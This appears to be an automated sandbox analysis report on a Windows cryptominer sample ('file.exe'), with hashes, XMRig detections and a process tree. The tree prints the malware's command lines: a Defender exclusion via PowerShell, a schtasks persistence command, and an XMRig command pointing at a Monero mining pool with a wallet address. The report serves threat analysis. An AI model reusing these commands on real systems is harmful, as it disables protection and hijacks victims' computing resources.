Analysis
-
max time kernel
92s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
21/11/2022, 22:55
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20221111-en
General
-
Target
file.exe
-
Size
1.4MB
-
MD5
4b743ce00d6be4c80149832cf08dee53
-
SHA1
e1e03b1e788667e8d396a95f4220015445bf40e8
-
SHA256
1a220e996b525d7eea69b1d127c9a53864c8b279237814b6c53dcf9b5fdf94cd
-
SHA512
79ed13fbdf15c8c0077d663eb5bc70ffd6e491b5aa774a7bac7d28d593090e78d096d9a2aa3f31ff3ab3acc48b5bed9748f68f74c0bd17ef09e6aa5a9c2da1c7
-
SSDEEP
24576:niIWK4wpe2SOR2O+QLBT1o40Tpn6w6mosuUNBVsNIcV8wJ:nil2pe2+OhFT1mpDLnOJ
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/2012-143-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2012-145-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2012-147-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2012-158-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/2012-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/2012-165-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 1068 OWT.exe -
Loads dropped DLL 1 IoCs
pid Process 520 cmd.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1068 set thread context of 2012 1068 OWT.exe 39 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1132 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 560 timeout.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2028 powershell.exe 1536 powershell.exe 1068 OWT.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1840 file.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 1068 OWT.exe Token: SeDebugPrivilege 1536 powershell.exe Token: SeLockMemoryPrivilege 2012 vbc.exe Token: SeLockMemoryPrivilege 2012 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2012 vbc.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 1840 wrote to memory of 2028 1840 file.exe 27 PID 1840 wrote to memory of 2028 1840 file.exe 27 PID 1840 wrote to memory of 2028 1840 file.exe 27 PID 1840 wrote to memory of 520 1840 file.exe 29 PID 1840 wrote to memory of 520 1840 file.exe 29 PID 1840 wrote to memory of 520 1840 file.exe 29 PID 520 wrote to memory of 560 520 cmd.exe 31 PID 520 wrote to memory of 560 520 cmd.exe 31 PID 520 wrote to memory of 560 520 cmd.exe 31 PID 520 wrote to memory of 1068 520 cmd.exe 32 PID 520 wrote to memory of 1068 520 cmd.exe 32 PID 520 wrote to memory of 1068 520 cmd.exe 32 PID 1068 wrote to memory of 1536 1068 OWT.exe 33 PID 1068 wrote to memory of 1536 1068 OWT.exe 33 PID 1068 wrote to memory of 1536 1068 OWT.exe 33 PID 1068 wrote to memory of 1904 1068 OWT.exe 35 PID 1068 wrote to memory of 1904 1068 OWT.exe 35 PID 1068 wrote to memory of 1904 1068 OWT.exe 35 PID 1904 wrote to memory of 1132 1904 cmd.exe 37 PID 1904 wrote to memory of 1132 1904 cmd.exe 37 PID 1904 wrote to memory of 1132 1904 cmd.exe 37 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39 PID 1068 wrote to memory of 2012 1068 OWT.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp5F50.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:560
-
-
C:\ProgramData\winrar\OWT.exe"C:\ProgramData\winrar\OWT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"5⤵
- Creates scheduled task(s)
PID:1132
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2012
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD54b743ce00d6be4c80149832cf08dee53
SHA1e1e03b1e788667e8d396a95f4220015445bf40e8
SHA2561a220e996b525d7eea69b1d127c9a53864c8b279237814b6c53dcf9b5fdf94cd
SHA51279ed13fbdf15c8c0077d663eb5bc70ffd6e491b5aa774a7bac7d28d593090e78d096d9a2aa3f31ff3ab3acc48b5bed9748f68f74c0bd17ef09e6aa5a9c2da1c7
-
Filesize
1.4MB
MD54b743ce00d6be4c80149832cf08dee53
SHA1e1e03b1e788667e8d396a95f4220015445bf40e8
SHA2561a220e996b525d7eea69b1d127c9a53864c8b279237814b6c53dcf9b5fdf94cd
SHA51279ed13fbdf15c8c0077d663eb5bc70ffd6e491b5aa774a7bac7d28d593090e78d096d9a2aa3f31ff3ab3acc48b5bed9748f68f74c0bd17ef09e6aa5a9c2da1c7
-
Filesize
138B
MD5fc95bd4f927062c5c092550537f7a67b
SHA1ac538e741ec6a9b271d2ae9ed81ed47e5371338c
SHA256968a295dba58104f66549546e761f1ef3c0239b552ea5521d97bd07be6a1874b
SHA5120d3ff55f90d600b6f13e3e9a3dedfbd2dfaa36064c00372fdc23ac3d283aea238be9736f862d30dd3bb6304526a31cf969d2d537e4c144ea51fd9cd58d03750b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5491bb8b0a35facfc860a9ef1567f263b
SHA1f5d260d3e5d071cca4efe41cc752816a32bbc29a
SHA256c9067f2cbbc63c35da4d91855d0ebd7a9c98b49e32dc62c75af0cd01cfaa29cd
SHA5121b06ba5e0d462cc305eae1dd32e7f7884f23182ff9c683974742e54af2623d8c0113217808c31a5d5ce32125294dd495fb8a59a87c56113b0628b1d0c8280470
-
Filesize
1.4MB
MD54b743ce00d6be4c80149832cf08dee53
SHA1e1e03b1e788667e8d396a95f4220015445bf40e8
SHA2561a220e996b525d7eea69b1d127c9a53864c8b279237814b6c53dcf9b5fdf94cd
SHA51279ed13fbdf15c8c0077d663eb5bc70ffd6e491b5aa774a7bac7d28d593090e78d096d9a2aa3f31ff3ab3acc48b5bed9748f68f74c0bd17ef09e6aa5a9c2da1c7